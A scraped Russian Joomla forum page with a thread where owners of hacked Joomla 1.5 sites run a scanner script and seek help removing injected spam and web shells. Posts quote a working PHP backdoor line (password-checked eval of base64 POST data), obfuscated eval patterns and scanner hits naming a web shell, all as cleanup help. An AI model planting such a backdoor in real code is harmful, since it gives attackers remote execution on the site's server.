Новости Joomla

Как тестировать Joomla PHP-разработчику? Компонент Patch tester.

👩‍💻 Как тестировать Joomla PHP-разработчику? Компонент Patch tester.Joomla - open source PHP-фреймворк с готовой админкой. Его основная разработка ведётся на GitHub. Для того, чтобы международному сообществу разработчиков было удобнее тестировать Pull Requests был создан компонент Patch Tester, который позволяет "накатить" на текущую установку Joomla именно те изменения, которые необходимо протестировать. На стороне инфраструктуры Joomla для каждого PR собираются готовые пакеты, в которых находится ядро + предложенные изменения. В каждом PR обычно находятся инструкции по тестированию: куда зайти, что нажать, ожидаемый результат. Тестировщики могут предположить дополнительные сценарии, исходя из своего опыта и найти баги, о которых сообщить разработчику. Или не найти, и тогда улучшение или исправление ошибки быстрее войдёт в ядро Joomla. Напомню, что для того, чтобы PR вошёл в ядро Joomla нужны минимум 2 положительных теста от 2 участников сообщества, кроме автора. Видео на YouTubeВидео на VK ВидеоВидео на RuTubeКомпонент на GitHub https://github.com/joomla-extensions/patchtester@joomlafeed#joomla #php #webdev #community

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6

Вышел релиз Revo PageBuilder Toolkit for YOOtheme Pro 1.6.2PageBuilder Toolkit - это специализированный плагин для конструктора страниц Yootheme Pro, содержит набор различных утилит для ускорения процесса работы и отладки макета, множественные улучшения в интерфейсе, включая поддержку dark mode, подсказки, быстрая смена разрешения в окне просмотра и много чего еще.v.1.6.2 Что нового?- Индикатор статусов: теперь не просто показывает состояние запросов, но и делает автоматические попытки их отправки при кратковременных сбоях в сети, а если это не помогло, то переводит конструктор в ручной режим, что позволяет сохранит макет и настройки темы прежде чем вы потеряете все, что было сделано с момента последнего сохранения- Подсветка ошибок в макете: плагин анализирует код страницы и может автоматически подсвечивать data атрибуты с кучей мусора, которые попадают в код страницы при копипасте из Figma в TinyMCE (пригодится для старых макетов, в текущей работе плагин сам очищает код мусора). Также есть подсветка семантических ошибок сборки - дубли h1 тега на странице и вложенных друг в друга заголовков.- Улучшена поддержка будущего релиза Yootheme Pro 5 и редактора CodeMirror 6Плагин для русскоязычных пользователей доступен в каталоге расширений SovMart и распространяется за символическую плату (100р). Разработчики Joomla расширений и партнеры автора могут получить плагин бесплатно.Для работы плагина необходим конструктор страниц Yootheme Pro.Разработчик плагина - участник нашего сообщества Александр Судьбинов (@alexrevo), член официальной группы поддержки Yootheme Pro. Страница расширенияОписание на сайте автора@joomlafeed#joomla #yootheme

• 299 Ответов
  • 189220 Просмотров
*

Vasiliy111

• Захожу иногда
  • 248
  • 5 / 0
Скачал, положил в корень, вызвал  сайт/fls.php

после проверки получил:
Спойлер
[свернуть]

Подскажите пожалуйста, что значат эти строки ?
*

oriol

• Завсегдатай
  • 1042
  • 100 / 4
не хватило времени на сканирование
Добавь в .htaccess
Код
php_value max_execution_time 1000
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
Подскажите пожалуйста, что значат эти строки ?
это значит, что надо проверить эти файлы
кроме файла сканера
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
  • Котэ просит! Не обижайте котэ!
Друзья! Помогите избавиться от гадости, которая терроризирует меня уже неделю.
Симптомы: появление текста на сайте с ссылками на забугорском языке. Текст всегда появляется вверху материала (материал сдвигается вниз). Текст появляется не во всех материалах (произвольно). Есть временный способ убрать текст. Описан тут ниже.
Вот скриншот:
Спойлер
[свернуть]
Что я успел сделать:
- убрал галки "сохранить пароль" во всех ftp клиентах: filezilla, total commander
- нашел пару файлов с названием thumbs.php со строкой (ниже). Файлы убил.
Код
<?php if(md5($_POST["password"])=="f2bb400a3ca9dc8a5590379a67872892"){eval(base64_decode($_POST["code"]));} ?>
- взял, используемый тут, fls.php. Получил список (под спойлером). Список почистил от самого fls.php
Спойлер
[свернуть]
Список внушительный...
- поудалял неиспользуемые расширения для Joomla
- скопировал сайт и проверил его антивирусами: Nod, Comodo Internet Security (все базы свежие). Ничего не нашлось
- провел поиск по тексту "eval(base64"
- добавил в каждую (!) папку файл index.html с текстом "<html><body bgcolor="#FFFFFF"></body></html>". Убил на это три часа.
- защитил админку с помощью plgSystemJSecure-1.0.7
- поменял пароли на довольно сложные к FTP и mysql. Также поменял пароль на админку.
- обратился к хостеру насчет прав на папки/файлы. Сам назначить не могу, поэтому жду ответа.

Расширения уже давно не обновлял и не устанавливал.
Joomla 1.5.12, переход на более свежий движок исключен: было сделано много изменений вручную в файлах Joomla и вспомнить что и где - невозможно.
Интересный момент: когда захожу в материал, где есть проявление этого гада, и пересохраняю его без изменений: зловредный текст пропадает на всех страницах. И проявляет себя по разному (в среднем раз в 6-24 часа). Надо бы еще проследить зависимость...
Имеется автоматически настроенная выгрузка из 1С (7.7) в базу сайта раз в день с другого компьютера. Сегодня сделаю наблюдение: на этом ли этапе происходит внедрение кода.
В последнее время, как я уже писал выше, ничего не устанавливалось. Делались лишь множественные правки вручную в шаблоне и в других файлах для повышения функциональности.
Был подключен чат от siteheart, но он был подключен достаточно давно, а вирус объявился недавно. Неужели он?
Где-то три месяца назад началась рассылка спама через уязвимость в стандартной форме "задать вопрос о товаре". Форма была убрана из шаблона. Стоить заметить - спам приходит, но реже. Скорее всего мой адрес уже у спамеров в базе.

Итак, требуется помощь от сообщества Joomla. Нужно удавить эту дрянь на корню и помочь другим с подобной проблемой.

*

oriol

• Завсегдатай
  • 1042
  • 100 / 4
Одного не понимаю с какого перепуга вы решили  что base64_decode должно быть именно так eval(base64
может быть и так
Код
$xxxxxxxxxx ='0JfQtNC10YHRjCDQt9Cw0LrQvtC00LjRgNC+0LLQsNC90L3Ri9C5INGC0LXQutGB0YI=';
echo base64_decode($xxxxxxxxxx);
и так
Код
<? eval(gzuncompress(base64_decode('0JfQtNC10YHRjCDQt9Cw0LrQvtC00LjRgNC+0LLQsNC90L3Ri9C5INGC0LXQutGB0YI=
и так
Код
eval(gzinflate(str_rot13(base64_decode(...)))
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
xaocbozzz
По списку сканера -ничего опасного не вижу.thumbs.php-это правильно.
Я всегда  ищу base64_decode
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
Хм. В общем с самого утра, после того, как я "подчистил" следы вируса - полет нормальный. Проверяю сайт каждые 20 минут, а также после использовании какого-либо ftp-клиента или проги для работы с базой.
Скоро попробую сделать выгрузку с 1С. Посмотрим, что из этого вырастет.
*

vitmail99

• Захожу иногда
  • 67
  • 2 / 2
спасибо за скрипт! эта штука отличный помошник!
*

vitmail99

• Захожу иногда
  • 67
  • 2 / 2
Вычистил свои сайты с помощью вашего скрипта, но осталась одна проблема: каким-то образом, каждый день у меня заменяется фаил .htaccess на всех сайтах и соответственно сайты падают, все сайты на одном хостинге, под одним аккаунтом. Все пароли менял уже 3 раза, ни в каких менеджерах их не сохраняю. Менял даже хостинг, не помогло. Все сайты: Joomla 1.5.25 + VirtueMart 1.1.9
Помогите, пожалуйста, решить проблему. Пример .htaccess (испорченный) можно скачать здесь: lover-shop.ru/hta.rar

P.S. ваш скрипт выдает много ссылок на фаилы содержащие строки: $_POST[ и confirm(
Часть из них я проверял, вроде все ок, но их просто не реально все проверить! Что с этим делать?
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
Итак, посидев пару суток и наблюдая за вируснёй, я выяснил, что:
- выгрузка из 1С совершенно не при чем.
- вирус не подвергается временному анализу: его признаки могут появиться и сейчас и через два дня.
- все, что я описывал выше - не помогло
- поискал в Инете подобные сканеры, но все что находил - не работало
Я в замешательстве... единственный оставшийся вариант - отключить все расширения для Joomla и включать по одному (или все наоборот). И наблюдать, когда появиться гаденыш. Только вот даже если брать из расчета 3 дня на каждое расширение... выходит цельных пару месяцев... Ну и естественно о нормальной работе сайта на этот период можно забыть...
*

MaxFarSeer

• Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
xaocbozzz, а вы к про не обращались? Возможно затраты окупятся быстрым излечением?
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

wishlight

• Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
В 1.5.12 есть большая уязвимость, насколько я помню. Обновляйте ядро и ищите шелл. Или латайте Может оно
*

wishlight

• Гуру
  • 5076
  • 319 / 1
  • От 300 руб быстрый хостинг. Сервера.
А нет.. Вход закрыт. Сайт я сам нашел какой. Дырка не там.

Офигенно нагадили

« Последнее редактирование: 16.04.2012, 18:36:11 от wishlight »
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
Вот вот. Что с этой заразой сделать?
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
xaocbozzz, а вы к про не обращались? Возможно затраты окупятся быстрым излечением?
Ну я все-таки верю в то, что на форуме есть люди, готовые помочь советом. Сам тут помогаю людям как могу и денег не требую. Хочется вникнуть в проблему и разобраться. А не просто отдать кому-то денег и не знать, что это было. Вознаградить за оказанную помощь - не проблема. Главное, чтобы в нужном направлении меня направили.
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
...Обновляйте ядро...
Для меня это последнее на что я могу пойти. Неужели это единственный выход? Если однозначно - да, тогда я не завидую себе, потому что предстоящий объем работ меня пугает.
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
Вирус все еще на месте... Почему, когда захожу в любой материал и пересохраняю его (без изменений) - текст вируса пропадает. (потом вновь появляется?)
*

MaxFarSeer

• Захожу иногда
  • 384
  • 29 / 0
  • http://ru.ah.fm:80
он появляется внось, потому что рассадник заразы сидит на сайте/хостинге (даже в другой папке на хостинге вполне может сидеть) и вновь внедряет свой код по истечении определенного времени.
Не можете найти, где редактировать код? Читаем:
Быстрый и легкий поиск нужных файлов для редактирования чего-либо

Я много времени потратил на изменение готовых шаблонов, раскуривание чего и как там у буржуев, менял код вложенный в 100500 дивов, да они неплохи эти T3 и Warp (YOO), но стоит начать делать свой шаблон...Ребята!!! Всем советую! Свое - так легко настраивать!
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
хм. Кажется я напал на след. В кэше Joomla нашел php файлы, которые содержат текст вируса. Затем вспомнил, что совершенно недавно я включил встроенный кэш Joomla (который все время был отключен). Сейчас очистил кэш и вуаля - текст исчез. Теперь отключаю кэш и жду пару дней... Кстати вопрос наперед: что делать, если мне нужен кэш?
*

oriol

• Завсегдатай
  • 1042
  • 100 / 4
Перезалей кэш только мало вероятно что это дело в кэше
----------------
Ты переименовал htaccess.txt в .htaccess ?
Ты закинул .htaccess в папку с картинками ?

P.S. Ищи во всем том что ты мне не скинул, а по твоим словам это картинки но по ошибкам я вижу что это еще и mod_city_rate,
возможно еще что то я не собираюсь копаться в ошибках и отслеживать что ты там мне не скинул.
Если ты считаешь что картинки не представляют опасности то ты глубоко ошибаешься, берешь картинку gif или png формата открываешь ее в  текстовом редакторе типа Notepad++ и вписываешь туда код, и вуаля (раньше uCoz через аватарки так взламывали )))
« Последнее редактирование: 23.04.2012, 10:12:32 от oriol »
*

xaocbozzz

• Захожу иногда
  • 205
  • 8 / 0
...
Ты переименовал htaccess.txt в .htaccess ?
Ты закинул .htaccess в папку с картинками ?
...
Да, это я сделал. Но дело действительно было в кэше. После того, как я его вырубил - все исчезло.

Хочу выразить огромную благодарность oriol и flyingspook за отзывчивость и помощь в моей проблеме. Ставлю вам +

ps. Только вот что с кэшем то теперь делать?
*

oriol

• Завсегдатай
  • 1042
  • 100 / 4
Кэш не при делах все там на месте
Самое интересное что Firefox эту хрень грузит а Chrome нет )) (у меня)
И у скриптов все запросы местные кроме одного http://xslt.alexa.com/site_stats/js/s/a?url=******.ru
Спойлер
[свернуть]
*

flyingspook

• Moderator
  • 3590
  • 247 / 9
Сканер полностью закодирован в base64 вопросов по этому поводу просьба не задовать
*

playtoppokerru

• Осваиваюсь на форуме
  • 30
  • 0 / 0
Здравствуйте.
Стали появляться SEO статьи на моем сайте, которые я не размещал.
Запустил сканер.
В результатах сканирования нашел:
Код
File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/sh.php
String:: Web Shell by oRb

File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/sh.php
String:: default_action = 'FilesMan'

Удалил (переименовал) этот sh.php.

Кроме того, встречаются строки типа:
Код
File: /home/p/pm100/pokermastera.ru/public_html/components/com_acymailing/views/newsletter/view.html.php
String:: confirm(
Настораживает двойное расширение: view.html.php
или это нормально? Что еще можно сделать.
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу

Удалил (переименовал) этот sh.php.

Настораживает двойное расширение: view.html.php
или это нормально? Что еще можно сделать.
index.html положи в папку,где переименованный скрипт sh.php.
view.html.php - это норма
*

playtoppokerru

• Осваиваюсь на форуме
  • 30
  • 0 / 0
index.html положи в папку,где переименованный скрипт sh.php.
view.html.php - это норма
Извиняюсь, не понял, какой index.html. В той папке где лежит переименованный скрипт (я его никуда не перемещал, только сменил имя и расширение) есть index.html
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
Ну тогда,норма.Хотя почему не удалить переименованный скрипт,или хотя бы написать приветствие с пожеланием.
*

playtoppokerru

• Осваиваюсь на форуме
  • 30
  • 0 / 0
Удалил, но вообще-то не помогло, сегодня появилась новая статья. Нужно искать дальше, а как не знаю:(((
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

При открытии сайта с режима инкогнито перекидывает на вирусный сайт

Автор 62411

Ответов: 6
Просмотров: 3184
Последний ответ 31.03.2024, 16:14:32
от SeBun
Компоненты и скрипты для защиты сайта. Логи атак на сайты

Автор wishlight

Ответов: 678
Просмотров: 268480
Последний ответ 14.09.2022, 14:29:43
от wishlight
Способы защиты сайта от DDoS атак?

Автор IgorMJ

Ответов: 7
Просмотров: 2769
Последний ответ 05.10.2021, 21:39:26
от ShopES
Тестирую сайты на уязвимости

Автор SalityGEN

Ответов: 0
Просмотров: 1048
Последний ответ 21.08.2021, 23:01:01
от SalityGEN
Новый набег ботов в регистрации сайта... Какой в этом смысл то?

Автор Cedars

Ответов: 11
Просмотров: 2435
Последний ответ 03.11.2020, 17:36:03
от Cedars